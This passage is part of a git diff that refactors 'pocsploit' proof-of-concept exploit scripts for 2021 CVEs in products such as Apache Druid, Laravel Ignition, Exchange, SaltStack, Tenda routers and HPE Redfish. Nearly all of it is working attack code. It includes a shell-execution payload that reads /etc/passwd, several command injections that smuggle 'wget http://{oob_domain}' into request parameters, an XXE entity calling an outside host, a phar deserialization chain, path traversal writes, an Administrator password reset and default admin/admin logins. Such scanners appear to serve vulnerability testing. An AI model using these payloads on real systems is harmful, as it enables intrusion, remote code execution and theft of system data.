+        data = """log={username}&pwd={password}&wp-submit=Log+In&testcookie=1""".format(username=username, password=password)
         headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'wordpress_test_cookie=WP%20Cookie%20check'}
         resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
diff --git a/2021/CVE-2021-25281/poc/pocsploit/CVE-2021-25281.py b/2021/CVE-2021-25281/poc/pocsploit/CVE-2021-25281.py
index d10189e65..073b45300 100644
--- a/2021/CVE-2021-25281/poc/pocsploit/CVE-2021-25281.py
+++ b/2021/CVE-2021-25281/poc/pocsploit/CVE-2021-25281.py
@@ -38,9 +38,9 @@ def poc(url):
 
         path = """/run"""
         method = "POST"
-        data = """{"client":"wheel_async","fun":"pillar_roots.write","data":"testing","path":"../../../../../../../tmp/testing","username":"1","password":"1","eauth":"pam"}"""
+        data = {"client":"wheel_async","fun":"pillar_roots.write","data":"testing","path":"../../../../../../../tmp/testing","username":"1","password":"1","eauth":"pam"}
         headers = {'Content-Type': 'application/json'}
-        resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         if ("""return""" in resp0.text and """tag""" in resp0.text and """jid""" in resp0.text and """salt""" in resp0.text and """wheel""" in resp0.text) and (resp0.status_code == 200):
             result["success"] = True
diff --git a/2021/CVE-2021-25646/poc/pocsploit/CVE-2021-25646.py b/2021/CVE-2021-25646/poc/pocsploit/CVE-2021-25646.py
index bdc7e148c..a3b590f56 100644
--- a/2021/CVE-2021-25646/poc/pocsploit/CVE-2021-25646.py
+++ b/2021/CVE-2021-25646/poc/pocsploit/CVE-2021-25646.py
@@ -38,42 +38,42 @@ def poc(url):
 
         path = """/druid/indexer/v1/sampler"""
         method = "POST"
-        data = """{
-"type":"index",
-"spec":{
-   "ioConfig":{
-      "type":"index",
-      "firehose":{
-         "type":"local",
-         "baseDir":"/etc",
-         "filter":"passwd"
-      }
-   },
-   "dataSchema":{
-      "dataSource":"odgjxrrrePz",
-      "parser":{
-         "parseSpec":{
-            "format":"javascript",
-            "timestampSpec":{
-
+        data = {
+            "type":"index",
+            "spec":{
+            "ioConfig":{
+                "type":"index",
+                "firehose":{
+                    "type":"local",
+                    "baseDir":"/etc",
+                    "filter":"passwd"
+                }
             },
-            "dimensionsSpec":{
+            "dataSchema":{
+                "dataSource":"odgjxrrrePz",
+                "parser":{
+                    "parseSpec":{
+                        "format":"javascript",
+                        "timestampSpec":{
+
+                        },
+                        "dimensionsSpec":{
 
+                        },
+                        "function":"function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"/bin/sh`@~-c`@~cat /etc/passwd\".split(\"`@~\")).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:\"4137368\",OQtGXcxBVQVL: hTVCCerYZ}}",
+                        "":{
+                        "enabled":"true"
+                        }
+                    }
+                }
+            }
             },
-            "function":"function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"/bin/sh`@~-c`@~cat /etc/passwd\".split(\"`@~\")).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:\"4137368\",OQtGXcxBVQVL: hTVCCerYZ}}",
-            "":{
-               "enabled":"true"
+            "samplerConfig":{
+            "numRows":10
             }
-         }
-      }
-   }
-},
-"samplerConfig":{
-   "numRows":10
-}
-}"""
+        }
         headers = {'Content-Type': 'application/json'}
-        resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         if (resp0.status_code == 200) and ("""application/json""" in str(resp0.headers)) and ("""numRowsRead""" in resp0.text and """numRowsIndexed""" in resp0.text) and (re.search(r"""root:.*:0:0:""",resp0.text)):
             result["success"] = True
diff --git a/2021/CVE-2021-26855/poc/pocsploit/CVE-2021-26855.py b/2021/CVE-2021-26855/poc/pocsploit/CVE-2021-26855.py
index f3b41cfdd..33c177958 100644
--- a/2021/CVE-2021-26855/poc/pocsploit/CVE-2021-26855.py
+++ b/2021/CVE-2021-26855/poc/pocsploit/CVE-2021-26855.py
@@ -46,7 +46,7 @@ def poc(url):
         path = """/owa/auth/x.js"""
         method = "GET"
         data = """"""
-        headers = {'Cookie': 'X-AnonResource=true; X-AnonResource-Backend=oob_domain/ecp/default.flt?~3;'}
+        headers = {'Cookie': 'X-AnonResource=true; X-AnonResource-Backend={oob_domain}/ecp/default.flt?~3;'.format(oob_domain=oob_domain)}
         resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         if verify_request(type="dns", flag=flag):
diff --git a/2021/CVE-2021-27358/poc/pocsploit/CVE-2021-27358.py b/2021/CVE-2021-27358/poc/pocsploit/CVE-2021-27358.py
index f507a0de2..ad29e26de 100644
--- a/2021/CVE-2021-27358/poc/pocsploit/CVE-2021-27358.py
+++ b/2021/CVE-2021-27358/poc/pocsploit/CVE-2021-27358.py
@@ -39,9 +39,9 @@ def poc(url):
 
         path = """/api/snapshots"""
         method = "POST"
-        data = """{"dashboard": {"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}"""
+        data = {"dashboard": {"editable":False,"hideControls":True,"nav":[{"enable":False,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}
         headers = {'Accept': 'application/json', 'Content-Type': 'application/json'}
-        resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         if ("""deleteUrl":""" in resp0.text and """deleteKey":""" in resp0.text) and ("""application/json""" in str(resp0.headers)):
             result["success"] = True
diff --git a/2021/CVE-2021-27931/poc/pocsploit/CVE-2021-27931.py b/2021/CVE-2021-27931/poc/pocsploit/CVE-2021-27931.py
index 63c58fdb6..ebf68e23d 100644
--- a/2021/CVE-2021-27931/poc/pocsploit/CVE-2021-27931.py
+++ b/2021/CVE-2021-27931/poc/pocsploit/CVE-2021-27931.py
@@ -45,11 +45,11 @@ def poc(url):
         data = """<?xml version="1.0" ?>
 <!DOCTYPE r [
 <!ELEMENT r ANY >
-<!ENTITY xxe SYSTEM "http://oob_domain">
+<!ENTITY xxe SYSTEM "http://{oob_domain}">
 ]>
 <method name="addPage">
 <id>&xxe;</id>
-</method>"""
+</method>""".format(oob_domain=oob_domain)
         headers = {}
         resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
diff --git a/2021/CVE-2021-29203/poc/pocsploit/CVE-2021-29203.py b/2021/CVE-2021-29203/poc/pocsploit/CVE-2021-29203.py
index 74f317566..307c93021 100644
--- a/2021/CVE-2021-29203/poc/pocsploit/CVE-2021-29203.py
+++ b/2021/CVE-2021-29203/poc/pocsploit/CVE-2021-29203.py
@@ -1,4 +1,6 @@
 import requests
+import random
+import string
 
 
 # Vuln Base Info
@@ -33,20 +35,21 @@ def fingerprint(url):
 # Proof of Concept
 def poc(url):
     result = {}
+    randstr = gen_randstr(10)
     try:
         url = format_url(url)
 
         path = """/redfish/v1/SessionService/ResetPassword/1/"""
         method = "PATCH"
-        data = """{"Password":"{{randstr}}"}"""
+        data = {"Password":"{randstr}".format(randstr=randstr)}
         headers = {'Accept': '*/*', 'Content-Type': 'application/json'}
-        resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         path = """/redfish/v1/SessionService/Sessions/"""
         method = "POST"
-        data = """{"UserName":"Administrator","Password":"{{randstr}}"}"""
+        data = {"UserName":"Administrator","Password":"{randstr}".format(randstr=randstr)}
         headers = {'Content-Type': 'application/json'}
-        resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp1 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         if (resp1.status_code == 201) and ("""X-Auth-Token""" in str(resp1.headers) and """PasswordReset""" in str(resp1.headers) and """Location""" in str(resp1.headers)) and ("""Base.1.0.Created""" in resp1.text):
             result["success"] = True
@@ -71,4 +74,7 @@ def format_url(url):
         url = 'http://' + url
     url = url.rstrip('/')
 
-    return url
\ No newline at end of file
+    return url
+
+def gen_randstr(length):
+    return ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(length))
\ No newline at end of file
diff --git a/2021/CVE-2021-3129/poc/pocsploit/CVE-2021-3129.py b/2021/CVE-2021-3129/poc/pocsploit/CVE-2021-3129.py
index 83613157f..ce479b287 100644
--- a/2021/CVE-2021-3129/poc/pocsploit/CVE-2021-3129.py
+++ b/2021/CVE-2021-3129/poc/pocsploit/CVE-2021-3129.py
@@ -38,39 +38,39 @@ def poc(url):
 
         path = """/_ignition/execute-solution"""
         method = "POST"
-        data = """{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}"""
+        data = {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}
         headers = {'Accept': 'application/json', 'Content-Type': 'application/json'}
-        resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         path = """/_ignition/execute-solution"""
         method = "POST"
-        data = """{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}"""
+        data = {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}
         headers = {'Accept': 'application/json', 'Content-Type': 'application/json'}
-        resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp1 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         path = """/_ignition/execute-solution"""
         method = "POST"
-        data = """{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "AA"}}"""
+        data = {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "AA"}}
         headers = {'Accept': 'application/json', 'Content-Type': 'application/json'}
-        resp2 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp2 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         path = """/_ignition/execute-solution"""
         method = "POST"
-        data = """{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=00=4F=00=33=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a"}}"""
+        data = {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=00=4F=00=33=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a"}}
         headers = {'Accept': 'application/json', 'Content-Type': 'application/json'}
-        resp3 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp3 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         path = """/_ignition/execute-solution"""
         method = "POST"
-        data = """{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}"""
+        data = {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}
         headers = {'Accept': 'application/json', 'Content-Type': 'application/json'}
-        resp4 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp4 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         path = """/_ignition/execute-solution"""
         method = "POST"
-        data = """{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "phar://../storage/logs/laravel.log/test.txt"}}"""
+        data = {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "phar://../storage/logs/laravel.log/test.txt"}}
         headers = {'Accept': 'application/json', 'Content-Type': 'application/json'}
-        resp5 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp5 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         if (resp5.status_code == 500) and ("""uid=""" in resp5.text and """gid=""" in resp5.text and """groups=""" in resp5.text and """Illuminate""" in resp5.text):
             result["success"] = True
diff --git a/2021/CVE-2021-31755/poc/pocsploit/CVE-2021-31755.py b/2021/CVE-2021-31755/poc/pocsploit/CVE-2021-31755.py
index 5e2576a76..a2220d60f 100644
--- a/2021/CVE-2021-31755/poc/pocsploit/CVE-2021-31755.py
+++ b/2021/CVE-2021-31755/poc/pocsploit/CVE-2021-31755.py
@@ -42,7 +42,7 @@ def poc(url):
 
         path = """/goform/setmac"""
         method = "POST"
-        data = """module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://oob_domain&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static"""
+        data = """module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://{oob_domain}&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static""".format(oob_domain=oob_domain)
         headers = {'Content-Type': 'application/x-www-form-urlencoded'}
         resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
diff --git a/2021/CVE-2021-32305/poc/pocsploit/CVE-2021-32305.py b/2021/CVE-2021-32305/poc/pocsploit/CVE-2021-32305.py
index 4e8f70a79..39637975b 100644
--- a/2021/CVE-2021-32305/poc/pocsploit/CVE-2021-32305.py
+++ b/2021/CVE-2021-32305/poc/pocsploit/CVE-2021-32305.py
@@ -40,7 +40,7 @@ def poc(url):
 
         oob_domain,flag = gen_oob_domain()
 
-        path = """/search.php?search=%22;wget+http%3A%2F%2Foob_domain%27;%22"""
+        path = """/search.php?search=%22;wget+http%3A%2F%2F{oob_domain}%27;%22""".format(oob_domain=oob_domain)
         method = "GET"
         data = """"""
         headers = {'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*'}
diff --git a/2021/CVE-2021-33544/poc/pocsploit/CVE-2021-33544.py b/2021/CVE-2021-33544/poc/pocsploit/CVE-2021-33544.py
index fc530a07a..ce39e2627 100644
--- a/2021/CVE-2021-33544/poc/pocsploit/CVE-2021-33544.py
+++ b/2021/CVE-2021-33544/poc/pocsploit/CVE-2021-33544.py
@@ -39,7 +39,7 @@ def poc(url):
 
         oob_domain,flag = gen_oob_domain()
 
-        path = """//uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://oob_domain)&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything"""
+        path = """//uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{oob_domain})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything""".format(oob_domain=oob_domain)
         method = "GET"
         data = """"""
         headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'}
diff --git a/2021/CVE-2021-34640/poc/pocsploit/CVE-2021-34640.py b/2021/CVE-2021-34640/poc/pocsploit/CVE-2021-34640.py
index 27b6700c6..0fb34601e 100644
--- a/2021/CVE-2021-34640/poc/pocsploit/CVE-2021-34640.py
+++ b/2021/CVE-2021-34640/poc/pocsploit/CVE-2021-34640.py
@@ -33,6 +33,8 @@ def fingerprint(url):
 # Proof of Concept
 def poc(url):
     result = {}
+    username = "admin"
+    password = "admin"
     try:
         url = format_url(url)
 
@@ -40,7 +42,7 @@ def poc(url):
 
         path = """/wp-login.php"""
         method = "POST"
-        data = """log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1"""
+        data = """log={username}&pwd={password}&wp-submit=Log+In&testcookie=1""".format(username=username, password=password)
         headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'wordpress_test_cookie=WP%20Cookie%20check'}
         resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
diff --git a/2021/CVE-2021-34643/poc/pocsploit/CVE-2021-34643.py b/2021/CVE-2021-34643/poc/pocsploit/CVE-2021-34643.py
index 67dcdf456..9f46c0ec2 100644
--- a/2021/CVE-2021-34643/poc/pocsploit/CVE-2021-34643.py
+++ b/2021/CVE-2021-34643/poc/pocsploit/CVE-2021-34643.py
@@ -33,6 +33,8 @@ def fingerprint(url):
 # Proof of Concept
 def poc(url):
     result = {}
+    username = "admin"
+    password = "admin"
     try:
         url = format_url(url)
 
@@ -40,7 +42,7 @@ def poc(url):
 
         path = """/wp-login.php"""
         method = "POST"
-        data = """log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1"""
+        data = """log={username}&pwd={password}&wp-submit=Log+In&testcookie=1""".format(username=username, password=password)
         headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'wordpress_test_cookie=WP%20Cookie%20check'}
         resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
diff --git a/2021/CVE-2021-3577/poc/pocsploit/CVE-2021-3577.py b/2021/CVE-2021-3577/poc/pocsploit/CVE-2021-3577.py
index 4161ad8c5..40c44c73d 100644
--- a/2021/CVE-2021-3577/poc/pocsploit/CVE-2021-3577.py
+++ b/2021/CVE-2021-3577/poc/pocsploit/CVE-2021-3577.py
@@ -40,7 +40,7 @@ def poc(url):
 
         oob_domain,flag = gen_oob_domain()
 
-        path = """/?action=command&command=set_city_timezone&value=$(wget%20http://oob_domain))"""
+        path = """/?action=command&command=set_city_timezone&value=$(wget%20http://{oob_domain}))""".format(oob_domain=oob_domain)
         method = "GET"
         data = """"""
         headers = {'Accept': '*/*'}
diff --git a/2021/CVE-2021-36380/poc/pocsploit/CVE-2021-36380.py b/2021/CVE-2021-36380/poc/pocsploit/CVE-2021-36380.py
index 1e683b524..ebc56d73e 100644
--- a/2021/CVE-2021-36380/poc/pocsploit/CVE-2021-36380.py
+++ b/2021/CVE-2021-36380/poc/pocsploit/CVE-2021-36380.py
@@ -41,7 +41,7 @@ def poc(url):
 
         path = """/cgi/networkDiag.cgi"""
         method = "POST"
-        data = """command=2&ipAddr=&dnsAddr=$(wget+http://oob_domain)&interface=0&netType=0&scrFilter=&dstFilter=&fileSave=false&pcapSave=false&fileSize="""
+        data = """command=2&ipAddr=&dnsAddr=$(wget+http://{oob_domain})&interface=0&netType=0&scrFilter=&dstFilter=&fileSave=false&pcapSave=false&fileSize=""".format(oob_domain=oob_domain)
         headers = {}
         resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
